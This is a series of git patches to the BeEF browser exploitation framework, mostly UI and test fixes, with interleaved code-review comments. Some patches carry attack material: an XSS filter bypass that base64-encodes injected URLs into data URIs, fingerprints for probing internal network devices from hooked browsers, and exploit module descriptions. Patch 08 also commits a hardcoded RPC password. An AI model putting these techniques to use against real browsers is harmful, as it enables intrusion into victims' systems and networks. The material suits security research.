From 74d176ff73984d6450a4bae35077b87650411a5e Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 13:16:13 +0100 Subject: [PATCH 01/16] Fixed issue 34: now only one zombie tab is created (current browser). When switching between browsers, the previous zombiePanel is destroyed. --- .../media/javascript/ui/panel/ZombieTab.js | 14 ++++++-------- .../admin_ui/media/javascript/ui/panel/common.js | 13 +++++++------ .../javascript/ui/panel/tabs/ZombieTabCommands.js | 8 ++++++-- .../media/javascript/ui/panel/zombiesTreeList.js | 7 ++++--- 4 files changed, 23 insertions(+), 19 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js index fda43b095..cea031726 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js +++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js @@ -21,27 +21,25 @@ ZombieTab = function(zombie) { requester_tab = new ZombieTab_Requester(zombie); xssrays_tab = new ZombieTab_XssRaysTab(zombie); - //------------------------------------------- ZombieTab.superclass.constructor.call(this, { - id: zombie.session, + id:"current-browser", activeTab: 0, loadMask: {msg:'Loading browser...'}, - title: zombie.ip, + title: "Current Browser", autoScroll: true, - closable: true, + closable: false, viewConfig: { forceFit: true, type: 'fit' }, items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab] }); - }; Ext.extend(ZombieTab, Ext.TabPanel, { listeners: { - close: function(panel) { - panel.destroy(); - } + activate: function(panel) {}, + deactivate: function(panel) {}, + close: function(panel) {} } }); diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index 1ffa07a39..3e56cfea8 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js 
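Review bot: The three listeners added to the `Ext.extend(ZombieTab, ...)` call are empty no-ops, and because the same hunk sets `closable: false` the `close` handler can never fire; the removed handler was the one that called `panel.destroy()`. Tear-down of the previous tab now appears to depend on `mainPanel.remove()` in zombiesTreeList.js and on the container's autoDestroy setting, neither of which is visible here. Either drop the stubs (`Ext.extend(ZombieTab, Ext.TabPanel, {});`) or give them a body and a comment saying what each is meant to do. The ZombieTabCommands.js hunk in this patch adds the same empty `close` listener and should get the same treatment.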
@@ -132,7 +132,8 @@ function get_dynamic_payload_details(payload, zombie) { generate_form_input_field(Ext.getCmp("payload-panel"), input, null, false, zombie); }); - Ext.getCmp("payload-panel").doLayout(); + Ext.getCmp("payload-panel").doLayout(); + console.log("========payloadPanel.doLayout=============="); } }) } @@ -146,6 +147,7 @@ function get_dynamic_payload_details(payload, zombie) { * @param: {Object} the status bar. */ function genExisingExploitPanel(panel, command_id, zombie, sb) { + console.log("genExisingExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -297,6 +299,7 @@ function genExisingExploitPanel(panel, command_id, zombie, sb) { * @param: {Object} the status bar. */ function genNewExploitPanel(panel, command_module_id, command_module_name, zombie, sb) { + if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -327,9 +330,8 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi } module = module.command_modules[1]; - panel.removeAll(); - - var form = new Ext.form.FormPanel({ + + var form = new Ext.form.FormPanel({ url: submiturl, id: 'form-command-module-zombie-'+zombie.session, @@ -394,7 +396,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi bodyBorder: false, height: 200, hidden: true, - border: false //we can remove the border of the panel + border: false //we can remove the border of the panel }); Ext.each(module.Data, function(input){ @@ -402,7 +404,6 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi ); form.add(payload_panel); - panel.add(form); panel.doLayout(); // hide the load mask after rendering of the config panel is done diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index b9e0dabc1..c4b6c6ff5 100644 
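Review bot: The last common.js hunk (`@@ -402,7 +404,6`) deletes `panel.add(form);` but keeps `panel.doLayout();`, and nothing in the visible hunks attaches the new FormPanel to `panel` any more; the follow-up patch 03/16 restores only `panel.removeAll()`. Unless the FormPanel config outside the hunk renders itself into the panel (`renderTo`/`applyTo`), the generated module form is built and then discarded. Restoring `panel.add(form);` immediately before `panel.doLayout();` keeps the original rendering path. genNewExploitPanel starts and ends outside these hunks.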
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js @@ -95,7 +95,7 @@ ZombieTab_Commands = function(zombie) { nonce: Ext.get ("nonce").dom.value } }); - + genNewExploitPanel(command_module_config, node.id, node.text, zombie, commands_statusbar); commands_statusbar.showValid('Ready'); } @@ -189,4 +189,8 @@ ZombieTab_Commands = function(zombie) { var sb = Ext.getCmp('command-module-bbar-zombie-'+zombie.session); }; -Ext.extend(ZombieTab_Commands, Ext.Panel, {}); +Ext.extend(ZombieTab_Commands, Ext.Panel, { + listeners: { + close: function(panel) {} + } +}); diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js index 9cbe9ecc3..5537ee34e 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js +++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js @@ -113,12 +113,13 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { //creates a new hooked browser tab when a hooked browser is clicked click: function(node, e) { if(!node.leaf) return; - - if(!mainPanel.get(node.attributes.session)) { + + mainPanel.remove(mainPanel.getComponent('current-browser')); + if(!mainPanel.getComponent('current-browser')) { mainPanel.add(new ZombieTab(node.attributes)); } - mainPanel.activate(node.attributes.session); + mainPanel.activate(mainPanel.getComponent('current-browser')); }, //show the context menu when a HB is right-clicked contextmenu: function(node, event){ From 1d74d7eeab405cca13e4b48eb2c9635807a6f298 Mon Sep 17 00:00:00 2001 
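Review bot: `mainPanel.remove(mainPanel.getComponent('current-browser'))` runs unconditionally, so the `if(!mainPanel.getComponent('current-browser'))` guard that follows is always true, and on the first click `remove()` receives `undefined` and relies on the container silently ignoring it (Ext 3 does, as far as I recall, but worth confirming). The intent reads more clearly as `var current = mainPanel.getComponent('current-browser'); if (current) { mainPanel.remove(current, true); } mainPanel.add(new ZombieTab(node.attributes));` followed by the existing `activate` call. Passing `true` as the second argument makes destruction of the replaced tab explicit instead of depending on autoDestroy. The click handler's enclosing Ext.extend call starts and ends outside the hunk.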
From: antisnatchor Date: Wed, 15 Feb 2012 13:28:17 +0100 Subject: [PATCH 02/16] Fixed a serious bug in beef.net.request when sending cross-domain POST data. jQuery is automatically changing the method to GET if the dataType (that was hardcoded in our code) is set to 'script'. --- core/main/client/net.js | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/core/main/client/net.js b/core/main/client/net.js index 9f84f5acc..b5340d472 100644 --- a/core/main/client/net.js +++ b/core/main/client/net.js @@ -168,9 +168,22 @@ beef.net = { response.was_cross_domain = cross_domain; var start_time = new Date().getTime(); + /* + * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script': + * This will turn POSTs into GETs for remote-domain requests. + */ + if (method == "POST"){ + $j.ajaxSetup({ + dataType: dataType + }); + }else{ //GET, HEAD, ... + $j.ajaxSetup({ + dataType: 'script' + }); + } + //build and execute the request $j.ajax({type: method, - dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server url: url, data: data, timeout: (timeout * 1000), From 55b52427e838da629851d448027afc533dbcccf2 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 14:09:53 +0100 Subject: [PATCH 03/16] re-added panel.removeAll when generating a newExploitPanel, corrected typo on function name genExistingExploitPanel --- extensions/admin_ui/media/javascript/ui/panel/common.js | 8 ++++---- .../media/javascript/ui/panel/tabs/ZombieTabCommands.js | 2 +- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index 3e56cfea8..e7090adb3 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js 
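Review bot: `$j.ajaxSetup()` changes jQuery's global defaults on every call, so the `dataType` chosen for one request leaks into every jQuery AJAX call made afterwards in the same page, including ones issued by unrelated code, and two interleaved requests can observe each other's setting. The removed `dataType: 'script'` was a per-request option, and the same fix fits there as a single line, `dataType: (method == "POST") ? dataType : 'script',`, with the jQuery note kept as the comment above it. `dataType` is not defined in the hunk, so presumably it is a parameter of the enclosing function; confirm it has a default for callers that omit it. The enclosing function starts and ends outside the hunk.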
@@ -146,8 +146,8 @@ function get_dynamic_payload_details(payload, zombie) { * @param: {Object} the targeted Zombie. * @param: {Object} the status bar. */ -function genExisingExploitPanel(panel, command_id, zombie, sb) { - console.log("genExisingExploitPanel========" + zombie.session); +function genExistingExploitPanel(panel, command_id, zombie, sb) { + console.log("genExistingExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -299,7 +299,7 @@ function genExisingExploitPanel(panel, command_id, zombie, sb) { * @param: {Object} the status bar. */ function genNewExploitPanel(panel, command_module_id, command_module_name, zombie, sb) { - + console.log("genNewExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -307,7 +307,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi var xgrid = Ext.getCmp('command-module-grid-zombie-'+zombie.session); var sb = Ext.getCmp('commands-bbar-zombie-'+zombie.session); - + panel.removeAll(); if(command_module_name == 'some special command module') { //HERE we will develop specific panels for the command modules that require it. } else { diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index c4b6c6ff5..0a81de564 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js @@ -77,7 +77,7 @@ ZombieTab_Commands = function(zombie) { if(!command_id) return; - genExisingExploitPanel(command_module_config, command_id, zombie, commands_statusbar); + genExistingExploitPanel(command_module_config, command_id, zombie, commands_statusbar); }); LoadCommandPanelEvent = function(node,keyclick) { 
From d9104b93f4983b1645884651b184febfa39c7904 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Wed, 15 Feb 2012 14:12:43 +0100 Subject: [PATCH 04/16] removed console.log function calls that were throwing errors on IE --- extensions/admin_ui/media/javascript/ui/panel/common.js | 3 --- .../media/javascript/ui/panel/tabs/ZombieTabCommands.js | 4 ---- .../admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js | 2 -- 3 files changed, 9 deletions(-) diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js index e7090adb3..df8129193 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/common.js +++ b/extensions/admin_ui/media/javascript/ui/panel/common.js @@ -133,7 +133,6 @@ function get_dynamic_payload_details(payload, zombie) { }); Ext.getCmp("payload-panel").doLayout(); - console.log("========payloadPanel.doLayout=============="); } }) } @@ -147,7 +146,6 @@ function get_dynamic_payload_details(payload, zombie) { * @param: {Object} the status bar. */ function genExistingExploitPanel(panel, command_id, zombie, sb) { - console.log("genExistingExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; @@ -299,7 +297,6 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) { * @param: {Object} the status bar. */ function genNewExploitPanel(panel, command_module_id, command_module_name, zombie, sb) { - console.log("genNewExploitPanel========" + zombie.session); if(typeof panel != 'object') { Ext.beef.msg('Bad!', 'Incorrect panel chosen.'); return; diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js index 0a81de564..bf9bb7357 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js 
@@ -139,16 +139,12 @@ ZombieTab_Commands = function(zombie) { 'afterrender' : function() { }, 'selectionchange' : function() { - console.log("selection changed"); }, 'activate' : function() { - console.log("activate"); }, 'select' : function() { - console.log("select"); }, 'keyup' : function() { - console.log("Key up"); }, 'render' : function(c) { c.getEl().on('keyup', function() { diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js index 1dd8b8f09..6d7eaf5dc 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js +++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js @@ -102,8 +102,6 @@ ZombieTab_Requester = function(zombie) { // itemclick: function(item) { // switch (item.id) { // case 'do-something': -// console.log("history_panel_context_menu.rowIndex: " + history_panel_context_menu.rowIndex); -// console.log("history_panel_context_menu.dbIndex: " + history_panel_context_menu.dbIndex); // break; // } // } From 9489e3c591ff1de4617d97d0a546dc803ef3387c Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Tue, 24 Jan 2012 19:59:15 +0100 Subject: [PATCH 05/16] moved imap ipec modules in a proper directory, added a note to imap ipec module about portbanning. --- modules/ipec/{ => inter_protocol_imap}/command.js | 0 modules/ipec/{ => inter_protocol_imap}/config.yaml | 2 +- modules/ipec/{ => inter_protocol_imap}/module.rb | 0 3 files changed, 1 insertion(+), 1 deletion(-) rename modules/ipec/{ => inter_protocol_imap}/command.js (100%) rename modules/ipec/{ => inter_protocol_imap}/config.yaml (89%) rename modules/ipec/{ => inter_protocol_imap}/module.rb (100%) diff --git a/modules/ipec/command.js b/modules/ipec/inter_protocol_imap/command.js similarity index 100% rename from modules/ipec/command.js rename to modules/ipec/inter_protocol_imap/command.js 
diff --git a/modules/ipec/config.yaml b/modules/ipec/inter_protocol_imap/config.yaml similarity index 89% rename from modules/ipec/config.yaml rename to modules/ipec/inter_protocol_imap/config.yaml index 618bd3255..214fa4152 100644 --- a/modules/ipec/config.yaml +++ b/modules/ipec/inter_protocol_imap/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: "IPEC" name: "IMAP" - description: "Using Inter-protocol Communication (IPEC) zombie browser will send commands to an IMAP4 server. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet." + description: "Using Inter-protocol Communication (IPEC) zombie browser will send commands to an IMAP4 server. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. Have in mind that browser Port Banning is denying connections to default IMAP port 143." authors: ["jgaliana", "wade"] target: working: ["FF", "C", "S", "O"] diff --git a/modules/ipec/module.rb b/modules/ipec/inter_protocol_imap/module.rb similarity index 100% rename from modules/ipec/module.rb rename to modules/ipec/inter_protocol_imap/module.rb From 1d7ad568d24e4e27c0fe80fc3580d12c5eea8f44 Mon Sep 17 00:00:00 2001 From: Wade Alcorn Date: Sun, 29 Jan 2012 13:33:36 +1000 Subject: [PATCH 06/16] Minor formatting update --- core/api/extensions.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/core/api/extensions.rb b/core/api/extensions.rb index fccda07d8..5d5be8cb2 100644 --- a/core/api/extensions.rb +++ b/core/api/extensions.rb @@ -23,9 +23,8 @@ module BeEF } # API hook fired after all extensions have been loaded - def post_load; end - - + def post_load; + end end end From 805e8c8af1eaa64f24c6af1532d39df7ccd0b0c6 Mon Sep 17 00:00:00 2001 
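Review bot: `def post_load;` leaves a stray semicolon after the method name, which Ruby accepts but nothing else in the hunk uses; the removed one-line form `def post_load; end` was the idiomatic spelling of an empty hook. If a two-line form is preferred, `def post_load` with no semicolon and `end` on the next line is the conventional layout, and a one-line comment such as `# intentionally empty` would make the empty body read as deliberate.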
From: bcoles Date: Wed, 1 Feb 2012 23:11:05 +1030 Subject: [PATCH 07/16] Added fingerprints to Fingerprint Network module --- .../network/internal_network_fingerprinting/command.js | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 01853359c..71d742f55 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -88,6 +88,15 @@ beef.execute(function() { new Array("VMware ESXi Server",":80",false,"/background.jpeg",1,1100), new Array("Microsoft Remote Web Workplace",":80",false,"/Remote/images/submit.gif",31,31), new Array("XAMPP",":80",false,"/xampp/img/xampp-logo-new.gif",200,59), + new Array("Xerox Printer",":80",false,"/printbut.gif",30,30), + new Array("Konica Minolta Printer",":80",false,"/G27_light.gif",206,26), + new Array("Epson Printer",":80",false,"/cyandot.gif",1,1), + new Array("HP Printer",":80",false,"/hp/device/images/hp_invent_logo.gif",160,52), + new Array("Syncrify",":5800",false,"/images/468x60.gif",468,60), + new Array("Winamp Web Interface",":80",false,"/img?image=121",30,30), + new Array("Zenoss Core",":8080",false,"/zport/dmd/favicon.ico",16,16), + new Array("BeEF",":3000",false,"/ui/media/images/beef.png",200,149), + new Array("BeEF (PHP)",":80",false,"/beef/images/beef.gif",32,32), new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16) ); From e8d729335000092530b27e42931e949e5e1d9437 Mon Sep 17 00:00:00 2001 From: Saafan Date: Mon, 6 Feb 2012 12:00:08 +0200 Subject: [PATCH 08/16] Listening to loopback only. Fixes issue #594 --- test/thirdparty/msf/unit/BeEF.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/thirdparty/msf/unit/BeEF.rc b/test/thirdparty/msf/unit/BeEF.rc index 326dc1681..fdedac018 100644 --- a/test/thirdparty/msf/unit/BeEF.rc +++ b/test/thirdparty/msf/unit/BeEF.rc 
@@ -1,2 +1,2 @@ -load msgrpc Pass=abc123 +load msgrpc ServerHost=127.0.0.1 Pass=abc123 From 61763ff103bfab9b3cd6f08c834c03bdee37baa9 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Tue, 7 Feb 2012 02:03:34 +0100 Subject: [PATCH 09/16] commented out require of selenium gem. not needed and throws errors on Mac OSX --- test/common/beef_test.rb | 3 +-- test/integration/ts_integration.rb | 1 - 2 files changed, 1 insertion(+), 3 deletions(-) diff --git a/test/common/beef_test.rb b/test/common/beef_test.rb index 460785e71..cdf13b86f 100644 --- a/test/common/beef_test.rb +++ b/test/common/beef_test.rb @@ -4,7 +4,6 @@ require 'capybara' Capybara.run_server = false # we need to run our own BeEF server require 'selenium/webdriver' -require "selenium" class BeefTest @@ -41,4 +40,4 @@ class BeefTest victim end -end \ No newline at end of file +end diff --git a/test/integration/ts_integration.rb b/test/integration/ts_integration.rb index b23d5d5fb..917de1324 100644 --- a/test/integration/ts_integration.rb +++ b/test/integration/ts_integration.rb @@ -21,7 +21,6 @@ require 'capybara' Capybara.run_server = false # we need to run our own BeEF server require 'selenium/webdriver' -require "selenium" require './check_environment' # Basic log in and log out tests require './tc_login' # Basic log in and log out tests From 4a92d3174ce1445ceec0c5c2edaf5beaf7672bbc Mon Sep 17 00:00:00 2001 From: Christian Frichot Date: Tue, 7 Feb 2012 21:24:02 +0800 Subject: [PATCH 10/16] Removed extended_in_modules code. See Issue #147 --- core/main/command.rb | 9 --------- core/ruby/module.rb | 18 ------------------ 2 files changed, 27 deletions(-) diff --git a/core/main/command.rb b/core/main/command.rb index fab0f965e..9336ff420 100644 --- a/core/main/command.rb +++ b/core/main/command.rb @@ -57,7 +57,6 @@ module Core # Super class controller # @param [String] key command module key def initialize(key) - get_extensions config = BeEF::Core::Configuration.instance @key = key 
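Review bot: Restricting msgrpc to `ServerHost=127.0.0.1` narrows the exposure, but the static `Pass=abc123` stays committed in the rc file, so any local user or process on a shared test host can still authenticate to the RPC service with a password that is public in the repository. A line such as `load msgrpc ServerHost=127.0.0.1 Pass=<msgrpc-pass-placeholder>` filled in by the test harness, or a comment stating that the file is only meant for throw-away local VMs, would make the intended trust boundary explicit.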
@@ -72,14 +71,6 @@ module Core @beefjs_components = {} end - # Uses the API to include all the code from extensions that need to add methods, constants etc to that class. - # @todo Determine if this method is deprecated - def get_extensions - BeEF::API::Command.extended_in_modules.each do |mod| - self.class.send(:include, mod) - end - end - # This function is called just before the instructions are sent to hooked browser. def pre_send; end diff --git a/core/ruby/module.rb b/core/ruby/module.rb index 4aaba8e7e..d7e0ae3b7 100644 --- a/core/ruby/module.rb +++ b/core/ruby/module.rb @@ -38,22 +38,4 @@ class Module unique_modules end end - - # Returns the modules extended inside the target module - # @return [Array] Array of modules - def extended_modules - (class << self; self end).included_modules - end - - # Returns the modules extending the target module - # @return [Array] Array of modules - def extended_in_modules - modules = [] - ObjectSpace.each_object(Module) { |k| modules << k if k.extended_modules.include?(self) } - - modules.reverse.inject([]) do |unique_modules, klass| - unique_modules << klass unless unique_modules.collect { |k| k.to_s }.include?(klass.to_s) - unique_modules - end - end end From e5aa0671a1d5a9d9d5561392e3507196fc2c4beb Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 9 Feb 2012 23:01:14 +1030 Subject: [PATCH 11/16] Removed "notes:" node from three module config.yaml files --- modules/exploits/safari_launch_app/config.yaml | 3 +-- modules/host/detect_protocol_handlers/config.yaml | 3 +-- modules/ipec/window_mail_client_dos/config.yaml | 3 +-- 3 files changed, 3 insertions(+), 6 deletions(-) diff --git a/modules/exploits/safari_launch_app/config.yaml b/modules/exploits/safari_launch_app/config.yaml index 1099bb595..25840021b 100755 --- a/modules/exploits/safari_launch_app/config.yaml +++ b/modules/exploits/safari_launch_app/config.yaml 
@@ -19,8 +19,7 @@ beef: enable: true category: "Exploits" name: "Safari Launch App" - description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details." - notes: "Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230" + description: "Launch an application from the victim machine.

See CVE-2011-3230 for more details.

Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel. Also see CVE-2011-3230" authors: ["antisnatchor"] target: user_notify: ["S"] diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml index baf8fe08d..a3de123a2 100644 --- a/modules/host/detect_protocol_handlers/config.yaml +++ b/modules/host/detect_protocol_handlers/config.yaml @@ -19,8 +19,7 @@ beef: enable: true category: "Host" name: "Get Protocol Handlers" - description: "This module attempts to identify protocol handlers present on the hooked browser." - notes: "Only Internet Explorer and Firefox are supported.

Firefox users are prompted to launch the application for which the protocol handler is responsible.

Firefox users are warned when there is no application assigned to a protocol handler.



The possible return values are: unknown, exists, does not exist" + description: "This module attempts to identify protocol handlers present on the hooked browser. Only Internet Explorer and Firefox are supported.

Firefox users are prompted to launch the application for which the protocol handler is responsible.

Firefox users are warned when there is no application assigned to a protocol handler.



The possible return values are: unknown, exists, does not exist." authors: ["bcoles"] target: working: ["IE"] diff --git a/modules/ipec/window_mail_client_dos/config.yaml b/modules/ipec/window_mail_client_dos/config.yaml index d7be2489d..8f1b007bc 100644 --- a/modules/ipec/window_mail_client_dos/config.yaml +++ b/modules/ipec/window_mail_client_dos/config.yaml @@ -19,8 +19,7 @@ beef: enable: true category: "IPEC" name: "Windows Mail Client DoS" - description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Win7-sp2)." - notes: "The protocol handler used will be: nntp.

" + description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's vulnerable also in Windows 7 SP2).

The protocol handler used will be: nntp." authors: ["bcoles"] target: user_notify: ["FF", "S"] From 58f2b4f7a1125f213e2629dfbcf9c05ed7113185 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Sun, 12 Feb 2012 11:49:38 +0100 Subject: [PATCH 12/16] Added detection of Chrome 17 --- core/main/client/browser.js | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/core/main/client/browser.js b/core/main/client/browser.js index abd8ae49c..4a77daf71 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -286,12 +286,20 @@ beef.browser = { return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false); }, + /** + * Returns true if Chrome 17. + * @example: beef.browser.isC17() + */ + isC17: function() { + return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false); + }, + /** * Returns true if Chrome. * @example: beef.browser.isC() */ isC: function() { - return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16(); + return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17(); }, /** @@ -355,6 +363,7 @@ beef.browser = { C14: this.isC14(), // Chrome 14 C15: this.isC15(), // Chrome 15 C16: this.isC16(), // Chrome 16 + C17: this.isC17(), // Chrome 16 C: this.isC(), // Chrome any version FF2: this.isFF2(), // Firefox 2 @@ -408,6 +417,7 @@ beef.browser = { if (this.isC14()) { return '14' }; // Chrome 14 if (this.isC15()) { return '15' }; // Chrome 15 if (this.isC16()) { return '16' }; // Chrome 16 + if (this.isC17()) { return '17' }; // Chrome 17 if (this.isFF2()) { return '2' }; // Firefox 2 
From 5bc6745e03d6f9dd44115ed25ec39e5d31ae1606 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Sun, 12 Feb 2012 13:45:35 +0100 Subject: [PATCH 13/16] Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter --- core/main/client/net/xssrays.js | 31 +++++++++++++++++++++++++------ 1 file changed, 25 insertions(+), 6 deletions(-) diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js index dad90c014..2db324759 100644 --- a/core/main/client/net/xssrays.js +++ b/core/main/client/net/xssrays.js @@ -308,7 +308,10 @@ beef.net.xssrays = { var ray = this.rays[beef.net.xssrays.uniqueID]; var paramsPos = 0; - if (params != null) { // check for XSS in GET parameters + if (params != null) { + /* + * ++++++++++ check for XSS in URI parameters (GET) ++++++++++ + */ for (var i in params) { if (params.hasOwnProperty(i)) { @@ -328,12 +331,19 @@ beef.net.xssrays = { exploit = vector.input.replace(/XSS/g, beefCallback); - url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&'; + if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later + url += i + '=' + exploit + '&'; + }else{ + url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&'; + } paramsPos++; } } - } else { // check for XSS in GET URL path + } else { + /* + * ++++++++++ check for XSS in URI path (GET) ++++++++++ + */ var filename = beef.net.xssrays.fileName(url); poc = vector.input.replace(/XSS/g, "alert(1)"); @@ -352,8 +362,9 @@ beef.net.xssrays = { //TODO: this need to checked and the slash shouldn't be added in this particular case url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/'); } - - + /* + * ++++++++++ create the iFrame that will contain the attack vector ++++++++++ + */ var iframe = document.createElement('iframe'); iframe.style.display = 'none'; iframe.id = 'ray' + beef.net.xssrays.uniqueID; 
@@ -361,10 +372,18 @@ beef.net.xssrays = { iframe.name = 'ray' + Math.random().toString(); if (method === 'GET') { - iframe.src = url; + if(beef.browser.isC() || beef.browser.isS()){ + var datauri = btoa(url); + iframe.src = "data:text/html;base64," + datauri; + }else{ + iframe.src = url; + } document.body.appendChild(iframe); beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]"); } else if (method === 'POST') { + /* + * ++++++++++ check for XSS in body parameters (POST) ++++++++++ + */ var form = '
'; poc = ''; pocurl = action + "?"; From 3ad2dbb3c7de5f72803eb27602edd8c0ebbeeab7 Mon Sep 17 00:00:00 2001 From: Ben Date: Wed, 15 Feb 2012 17:52:08 +1000 Subject: [PATCH 14/16] Rake task to generate DMG image --- Rakefile | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/Rakefile b/Rakefile index af804db80..96aa5c920 100644 --- a/Rakefile +++ b/Rakefile @@ -135,3 +135,20 @@ file '/tmp/msf-test/msfconsole' do sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test" end + +################################ +# Create Mac DMG File + +task :dmg do + puts "\nCreating Working Directory\n"; + sh "mkdir dmg"; + sh "mkdir dmg/BeEF"; + sh "rsync * dmg/BeEF --exclude=dmg -r"; + sh "ln -s /Applications dmg/"; + puts "\nCreating DMG File\n" + sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov"; + puts "\nCleaning Up\n" + sh "rm -r dmg"; + puts "\nBeEF.dmg created\n" +end + From 667d00351d34ddd8d726465917c2fd2ead75e650 Mon Sep 17 00:00:00 2001 From: Ben Date: Wed, 15 Feb 2012 17:52:54 +1000 Subject: [PATCH 15/16] Updated README instructions for MAC OS X --- README | 9 +++++++-- beef | 2 +- install | 2 +- 3 files changed, 9 insertions(+), 